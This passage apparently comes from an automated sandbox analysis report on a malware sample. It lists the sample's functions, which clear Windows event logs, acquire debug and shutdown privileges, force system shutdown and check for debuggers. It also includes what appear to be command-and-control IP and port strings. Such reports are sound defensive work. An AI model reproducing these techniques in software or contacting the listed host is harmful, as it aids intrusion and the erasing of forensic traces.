                                                                                                  • CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                  • API String ID: 3435690185-3733053543
                                                                                                  • Opcode ID: d6cc3713e19fe27b542794b6d51b369aaeaf74a6f1ec23f9ac9317727016f446
                                                                                                  • Instruction ID: f65a6439671d963347aa90ba6037e2cbbbd5f001d6dae7c7fd6badc09de2b028
                                                                                                  • Opcode Fuzzy Hash: d6cc3713e19fe27b542794b6d51b369aaeaf74a6f1ec23f9ac9317727016f446
                                                                                                  • Instruction Fuzzy Hash: E0118671E802089BD720DBA4DC4AFAE7778EF54700F514959FD05A7380CA759D14CBA0
                                                                                                  Function 02D0B3C0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • OpenEventLogW.ADVAPI32(00000000,02D258BC), ref: 02D0B3E7
                                                                                                  • ClearEventLogW.ADVAPI32(00000000,00000000), ref: 02D0B3F2
                                                                                                  • CloseEventLog.ADVAPI32(00000000), ref: 02D0B3F9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$ClearCloseOpen
                                                                                                  • String ID: Application$Security$System
                                                                                                  • API String ID: 1391105993-2169399579
                                                                                                  • Opcode ID: 927c08153c7e71dffe45d7fbeb67ed4145a60e8d802e6ae889f65b1cc5f4c7b4
                                                                                                  • Instruction ID: 9490494436d885f0ef73e4054ca412577d92fea366d74ece6cb7ee4a114eea0e
                                                                                                  • Opcode Fuzzy Hash: 927c08153c7e71dffe45d7fbeb67ed4145a60e8d802e6ae889f65b1cc5f4c7b4
                                                                                                  • Instruction Fuzzy Hash: 92E0E532B0522047C2258B15A988B1FF7E0FBE831DF61064AF94896354C6708D198B99
                                                                                                  Function 0282660F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3787310787.0000000002820000.00000040.00001000.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2820000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: swprintf$_memset
                                                                                                  • String ID: :$@
                                                                                                  • API String ID: 1292703666-1367939426
                                                                                                  • Opcode ID: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
                                                                                                  • Instruction ID: a60a8420964c09278279a69aef08f9260c3996a017a718bc62df980ecb1d95e4
                                                                                                  • Opcode Fuzzy Hash: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
                                                                                                  • Instruction Fuzzy Hash: 223152B6D0021CABDB14CFE9CC85FEEB7B9FB48300F50421DE90AA7241E6746945CB94
                                                                                                  Function 03FAAF0B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000003.3578743810.0000000003FA4000.00000004.00000020.00020000.00000000.sdmp, Offset: 03FA4000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_3_3fa4000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: swprintf$_memset
                                                                                                  • String ID: :$@
                                                                                                  • API String ID: 1292703666-1367939426
                                                                                                  • Opcode ID: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
                                                                                                  • Instruction ID: 433559550cc6b730c5c373a8b10870f03729fa8d88ba7693e8a1ddb01d0acd27
                                                                                                  • Opcode Fuzzy Hash: 3d5004218d91dc4100e046b41ba34f0424eaff1e0d9aac26d7e5b183c8120afd
                                                                                                  • Instruction Fuzzy Hash: B73130B6D0021CABDB14DFE5CC85FEEB7B9FB48300F50821DE91AA7245E6746905CB94
                                                                                                  Function 02D07740 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,?,?,?,?,02D078FC), ref: 02D07756
                                                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,02D078FC,?,?,?,?,?,?,76F90630), ref: 02D0775D
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 02D07785
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 02D077B9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                  • String ID: SeDebugPrivilege
                                                                                                  • API String ID: 2349140579-2896544425
                                                                                                  • Opcode ID: 3d6e71c0a9499579a7c545abedf33d8913bbfc1ee5abdec3201daecd4449e6ed
                                                                                                  • Instruction ID: 46384545f369de81eaafba580d731601552e8068a5a5f72c9bb71824b3dba37a
                                                                                                  • Opcode Fuzzy Hash: 3d6e71c0a9499579a7c545abedf33d8913bbfc1ee5abdec3201daecd4449e6ed
                                                                                                  • Instruction Fuzzy Hash: 99118270F40208ABEB14CFE4D949FAEB7B4EB58704F208558F905AB3C0DA74A908CB60
                                                                                                  Function 02D0F00A Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 02D1131C
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02D11331
                                                                                                  • UnhandledExceptionFilter.KERNEL32(02D225B8), ref: 02D1133C
                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 02D11358
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 02D1135F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2579439406-0
                                                                                                  • Opcode ID: 4473d149b15df6103430fba789e42b054a7068b680ba82f61b8fb00446ab5022
                                                                                                  • Instruction ID: ad967e6bd707c3099400ddbd5f34643d619c0cc1199e907d32c966b3cae7124f
                                                                                                  • Opcode Fuzzy Hash: 4473d149b15df6103430fba789e42b054a7068b680ba82f61b8fb00446ab5022
                                                                                                  • Instruction Fuzzy Hash: A921E4B5C84300DFD764DF29F188A443BB0BB68710F526C1AE90882B90DB715DA8DF65
                                                                                                  Function 00976815 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 0097793D
                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00977952
                                                                                                  • UnhandledExceptionFilter.KERNEL32(00985350), ref: 0097795D
                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00977979
                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00977980
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 2579439406-0
                                                                                                  • Opcode ID: ff4865731b6c7e501e33fd0115246c6003a2c34bceeea123202fa20362be66fa
                                                                                                  • Instruction ID: 62972c1bb58a2405cfc9b0707e50c114ec745767bc8e4562ec371860310db965
                                                                                                  • Opcode Fuzzy Hash: ff4865731b6c7e501e33fd0115246c6003a2c34bceeea123202fa20362be66fa
                                                                                                  • Instruction Fuzzy Hash: 5A21E2B583C200DFE701DF6AFD496583BA5FB08754F44501BE58987360EBB89984EF02
                                                                                                  Function 02D0B463 Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D07B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                    • Part of subcall function 02D07B70: OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                    • Part of subcall function 02D07B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                    • Part of subcall function 02D07B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                    • Part of subcall function 02D07B70: GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • ExitWindowsEx.USER32(00000005,00000000), ref: 02D0B471
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 681424410-0
                                                                                                  • Opcode ID: 22c935f8f0492920b6ae4717bd32cffcd332ee05ee3803e0b4884722ceac27a6
                                                                                                  • Instruction ID: 4774fee989572520f166aa6b370e4e4d2cdff200d76e52c36c59cada48c23586
                                                                                                  • Opcode Fuzzy Hash: 22c935f8f0492920b6ae4717bd32cffcd332ee05ee3803e0b4884722ceac27a6
                                                                                                  • Instruction Fuzzy Hash: 1AC08C3238010002E22432B47866B6AF341DB94322F01042FAB0E8C2D00C52ACA489B6
                                                                                                  Function 02D0B41B Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D07B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                    • Part of subcall function 02D07B70: OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                    • Part of subcall function 02D07B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                    • Part of subcall function 02D07B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                    • Part of subcall function 02D07B70: GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • ExitWindowsEx.USER32(00000004,00000000), ref: 02D0B429
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 681424410-0
                                                                                                  • Opcode ID: 70a326e440a774401d790389530aea1758caa5e78f6ce6af221ecf998542b6dd
                                                                                                  • Instruction ID: 6cd5b449536373880b5f0cdd04caa185a99c64d4a76ebc91112c79f965ca83ac
                                                                                                  • Opcode Fuzzy Hash: 70a326e440a774401d790389530aea1758caa5e78f6ce6af221ecf998542b6dd
                                                                                                  • Instruction Fuzzy Hash: 69C08C3238010006E22433B47866B69F341DB94322F00042BAB0E8C2D00C62ACA485BA
                                                                                                  Function 02D0B43F Relevance: 1.5, APIs: 1, Instructions: 13shutdownCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D07B70: GetCurrentProcess.KERNEL32(00000028,?), ref: 02D07B89
                                                                                                    • Part of subcall function 02D07B70: OpenProcessToken.ADVAPI32(00000000), ref: 02D07B90
                                                                                                    • Part of subcall function 02D07B70: LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 02D07BB6
                                                                                                    • Part of subcall function 02D07B70: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,00000000,00000000), ref: 02D07BCC
                                                                                                    • Part of subcall function 02D07B70: GetLastError.KERNEL32 ref: 02D07BD2
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BE0
                                                                                                  • ExitWindowsEx.USER32(00000006,00000000), ref: 02D0B44D
                                                                                                    • Part of subcall function 02D07B70: CloseHandle.KERNEL32(?), ref: 02D07BFB
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 681424410-0
                                                                                                  • Opcode ID: 265df35d8b27238a0d2bdb8eff34310ded7da8e00aab9ff70b09f8d050efe753
                                                                                                  • Instruction ID: 97d6e52a903cf6d06ad42d8f869744ab4192744d0f15e54e6c5239f85c7e4e75
                                                                                                  • Opcode Fuzzy Hash: 265df35d8b27238a0d2bdb8eff34310ded7da8e00aab9ff70b09f8d050efe753
                                                                                                  • Instruction Fuzzy Hash: 43C08C3238010002E22432B47866B6AF342DB94322F00042BAA0E8C2D00C53ACA485B6
                                                                                                  Function 02D0B556 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 161registrysleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 02D0F707: _malloc.LIBCMT ref: 02D0F721
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002,?), ref: 02D0B586
                                                                                                  • RegDeleteValueW.ADVAPI32(?,IpDate), ref: 02D0B596
                                                                                                  • RegSetValueExW.ADVAPI32(?,IpDate,00000000,00000003,00000002,?), ref: 02D0B5B3
                                                                                                  • _memset.LIBCMT ref: 02D0B5D4
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0B61B
                                                                                                  • _memset.LIBCMT ref: 02D0B63C
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 02D0B72C
                                                                                                  • Sleep.KERNEL32(000007D0), ref: 02D0B737
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F756
                                                                                                    • Part of subcall function 02D0F707: std::exception::exception.LIBCMT ref: 02D0F770
                                                                                                    • Part of subcall function 02D0F707: __CxxThrowException@8.LIBCMT ref: 02D0F781
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue_memsetstd::exception::exception$DeleteException@8OpenSleepThrow_malloc
                                                                                                  • String ID: 8.217.85.20$8.217.85.20$8.217.85.20$9091$9092$9093$Console$IpDate$o1:$o2:$o3:$p1:$p2:$p3:$t1:$t2:$t3:
                                                                                                  • API String ID: 1186799303-1244596247
                                                                                                  • Opcode ID: 03a14f952d7bcd69362e74d37ae2b2ddeae55ed7a4339272c51b1ac55f43aac4
                                                                                                  • Instruction ID: 78751146e183d4eb260e13da3cf25df78d8a26e1789fa84706dc8dfe6ae5b8b7
                                                                                                  • Opcode Fuzzy Hash: 03a14f952d7bcd69362e74d37ae2b2ddeae55ed7a4339272c51b1ac55f43aac4
                                                                                                  • Instruction Fuzzy Hash: A441D6717803107BF224A750BC87F5AB355DF65B19F604114FA067A3C1DAE0BD1D8ABA
                                                                                                  Function 02D14014 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D1401C
                                                                                                  • __mtterm.LIBCMT ref: 02D14028
                                                                                                    • Part of subcall function 02D13CF1: DecodePointer.KERNEL32(00000009,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13D02
                                                                                                    • Part of subcall function 02D13CF1: TlsFree.KERNEL32(00000027,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D13D1C
                                                                                                    • Part of subcall function 02D13CF1: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D18D48
                                                                                                    • Part of subcall function 02D13CF1: _free.LIBCMT ref: 02D18D4B
                                                                                                    • Part of subcall function 02D13CF1: DeleteCriticalSection.KERNEL32(00000027,?,?,02D11084,02D1106A,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D18D72
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D1403E
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D1404B
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D14058
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D14065
                                                                                                  • TlsAlloc.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140B5
                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140D0
                                                                                                  • __init_pointers.LIBCMT ref: 02D140DA
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140EB
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D140F8
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14105
                                                                                                  • EncodePointer.KERNEL32(?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14112
                                                                                                  • DecodePointer.KERNEL32(Function_00013E75,?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14133
                                                                                                  • __calloc_crt.LIBCMT ref: 02D14148
                                                                                                  • DecodePointer.KERNEL32(00000000,?,?,02D10FC1,02D26278,00000008,02D11155,?,?,?,02D26298,0000000C,02D11210,?), ref: 02D14162
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02D14174
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_2d00000_FIWszl1A8l.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                  • API String ID: 3698121176-3819984048
                                                                                                  • Opcode ID: 2c80309c79c3b22abc7f993f2f13c0aa55d0e6b5be5193cf56ce52bc70b19b86
                                                                                                  • Instruction ID: 0fcd32c957ebbfd4937017d6da1b88a2d43fea7ad9ff297bf93e0ce2ab4eabc6
                                                                                                  • Opcode Fuzzy Hash: 2c80309c79c3b22abc7f993f2f13c0aa55d0e6b5be5193cf56ce52bc70b19b86
                                                                                                  • Instruction Fuzzy Hash: 3A319132E84310BFEB61AF75FC086153FA5EB54766B510A1AE810D3750EB318CA5EF50
                                                                                                  Function 00979AC6 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979ACE
                                                                                                  • __mtterm.LIBCMT ref: 00979ADA
                                                                                                    • Part of subcall function 009797A5: DecodePointer.KERNEL32(00000008,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 009797B6
                                                                                                    • Part of subcall function 009797A5: TlsFree.KERNEL32(00000025,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 009797D0
                                                                                                    • Part of subcall function 009797A5: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 0097C031
                                                                                                    • Part of subcall function 009797A5: _free.LIBCMT ref: 0097C034
                                                                                                    • Part of subcall function 009797A5: DeleteCriticalSection.KERNEL32(00000025,?,?,009776A5,0097768B,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 0097C05B
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00979AF0
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00979AFD
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00979B0A
                                                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00979B17
                                                                                                  • TlsAlloc.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979B67
                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979B82
                                                                                                  • __init_pointers.LIBCMT ref: 00979B8C
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979B9D
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BAA
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BB7
                                                                                                  • EncodePointer.KERNEL32(?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BC4
                                                                                                  • DecodePointer.KERNEL32(Function_00009929,?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979BE5
                                                                                                  • __calloc_crt.LIBCMT ref: 00979BFA
                                                                                                  • DecodePointer.KERNEL32(00000000,?,?,009775E2,00987B60,00000008,00977776,?,?,?,00987B80,0000000C,00977831,?), ref: 00979C14
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00979C26
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3783149184.0000000000971000.00000020.00001000.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3783120612.0000000000970000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783398922.0000000000985000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783474116.0000000000989000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783526835.000000000098F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000006.00000002.3783608851.0000000000991000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_6_2_970000_FIWszl1A8l.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                  • API String ID: 3698121176-3819984048
                                                                                                  • Opcode ID: fbbbe8779bdab4fb6b2f981732d31e73f656ac712db2745ddcf526b65311ed13
                                                                                                  • Instruction ID: b474cabb6fb2e2c26403d1a3fc26e27572c1457b05ae6f955033bc173489585b
                                                                                                  • Opcode Fuzzy Hash: fbbbe8779bdab4fb6b2f981732d31e73f656ac712db2745ddcf526b65311ed13
                                                                                                  • Instruction Fuzzy Hash: 50319FB296C715ABCB21AF78EC0961A3FA4EB84764F1D451AF408C33B0EB348405EF40
                                                                                                  Function 02D0C3A0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 170stringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000006.00000002.3788081073.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true
                                                                                                  • Associated: 00000006.00000002.3788081073.0000000002D34000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
